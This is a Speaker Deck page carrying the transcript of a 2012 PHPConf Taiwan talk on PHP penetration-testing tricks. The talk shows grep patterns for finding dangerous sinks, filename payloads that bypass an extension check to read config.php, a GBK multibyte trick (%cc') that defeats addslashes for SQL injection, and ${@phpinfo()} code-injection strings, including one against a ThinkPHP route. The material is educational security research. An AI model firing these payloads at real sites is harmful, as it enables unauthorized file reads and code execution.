Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Security in PHP 那些在滲透測試的小技巧
Search
Orange
August 21, 2024
0
33
Security in PHP 那些在滲透測試的小技巧
PHPConf Taiwan 2012
Orange
August 21, 2024
Tweet
Share
More Decks by Orange
See All by Orange
Best Practices - The Upload
p8361
0
21
網頁安全 Web Security 入門
p8361
0
40
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
36k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
p8361
6
12k
PHPConf 2013 - 矛盾大對決
p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
15
12k
駭客看 Django
p8361
25
12k
Featured
See All Featured
Understanding Cognitive Biases in Performance Measurement
bluesmoon
26
1.5k
Why You Should Never Use an ORM
jnunemaker
PRO
54
9.1k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
247
1.3M
Principles of Awesome APIs and How to Build Them.
keavy
126
17k
The MySQL Ecosystem @ GitHub 2015
samlambert
250
12k
The Myth of the Modular Monolith - Day 2 Keynote - Rails World 2024
eileencodes
17
2.3k
Facilitating Awesome Meetings
lara
50
6.1k
A Tale of Four Properties
chriscoyier
157
23k
Put a Button on it: Removing Barriers to Going Fast.
kastner
59
3.6k
Designing for humans not robots
tammielis
250
25k
KATA
mclloyd
29
14k
Typedesign – Prime Four
hannesfritz
40
2.4k
Transcript
2012/11/03 @ PHPCONF <
[email protected]
>
• aka Orange • 2009 • 2011 • 2011 AVTOKYO
• – – Web Security – Windows Vulnerability Exploitation
• CHROOT Security Group • NISRA • case. • Blog
– http://blog.orange.tw/
None
None
None
▪▪
None
<?php $url = $_GET['url']; echo urlencode( $url ); ?>
• Low – Sensitive Information Leakage… • Middle – Insecure
File Download/Access… • High – Local File Inclusion, Code Injection, SQL Inj…
None
• – – –
• showNews.php?id=198 – showNews.php?id=198/1 • checkName.php?u=lala – checkName.php?u=lala%cc' • getFile.php?path=hsu.doc
– getFile.php?path=./hsu.doc • main.php?module=index – main.php?module[]=index
None
None
1. Router, Controller URL Mapping 2. 3. 4. DB ORM
PHP orz
1. – system exec shell_exec popen eval create_function call_user_func preg_replace…
2. – _GET _POST _COOKIE _REQUEST _ENV _FILES _SERVER HTTP_RAW_POST_DATA php://input getenv …
• grep -Re – (include|require).+\$ – (eval|create_function|call_user_func|…).+\$ – (system|exec|shell_exec|passthru|…).+\$ –
(select|insert|update|where|…).+\$ – (file_get_contents|readfile|fopen|…).+\$ – (unserialize|parse_str|…).+\$ – \$\$, $a\(\) – ……
• grep -Re – \$(_GET|_POST|_COOKIE|_REQUEST|_FILES) – \$(_ENV|_SERVER) – getenv –
HTTP_RAW_POST_DATA – php://input – …
try { …… $trans->commit(); } catch (xxx_adapter_exception $e) { $trans->rollback();
require_once 'xxx_exceptio$n.class.php' throw new xxx_exception( …… ); }
None
None
<?php $name = $_GET['name']; $name = basename( $name ); if
( eregi( "(.php|.conf)$", $name ) ) exit( "Not Allow PHP." ); else readfile( DOCUMENT_ROOT. $name ); ?>
• down.php?name= – config.php – config"php – config.ph> – config.<
– c>>>>>"< – c<"< Test on PHP 5.4.8 newest stable version (2012/10/17) Original Will be replaced by < * > ? " .
None
• file_get_contents – > php_stream_open_wrapper_ex – > zend_resolve_path – >
php_resolve_path_for_zend – > php_resolve_path – > tsrm_realpath – > virtual_file_ex – > tsrm_realpath_r
None
• file_get_contents • file_put_contents • file • readfile • phar_file_get_contents
• include • include_once • require • require_once • fopen • opendir • readdir • mkdir • ……
None
• config.php/. • config.php///. • c>>>>>.</// Works on PHP 5.2.*
(2012/10/26)
None
• Web Browser PHP Output (HTML) – Cross-Site Scripting •
DB Management PHP Output (SQL) – SQL Injection
SELECT * FROM [table] WHERE username = 'PHPCONF'
SELECT * FROM [table] WHERE username = 'PHPCONF\''
SELECT * FROM [table] WHERE username = 'PHPCONF%cc\''
Σ( ° △ °|||)︴ Before After PHPCONF PHPCONF PHPCONF' PHPCONF\'
PHPCONF%80' PHPCONF�\' PHPCONF%cc' PHPCONF岤' 0x81-0xFE 0x40-0x7E 0xA1-0xFE
• addslashes • mysql_escape_string • magic_quote_gpc • Special Cases –
pdo – mysql_real_escape_st ring
None
• $url = "http://phpconf.tw/2012/"; • $url = "http://phpconf.tw/$year/"; • $url
= "http://phpconf.tw/{$year}/"; • $url = "http://phpconf.tw/{${phpinfo()}}/"; • $url = "http://phpconf.tw/${@phpinfo()}/";
config.php $dbuser = "root";
config.php $dbuser = "${@phpinfo()}";
$res = preg_replace('@(w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths)); https://orange.tw/index.php?s=module/action/ param1/${@phpinfo()}
Think PHP
None
– – – – – –
• PHP Security – http://blog.php-security.org/ • Oddities of PHP file
access in Windows®. – http://onsec.ru/onsec.whitepaper-02.eng.pdf
None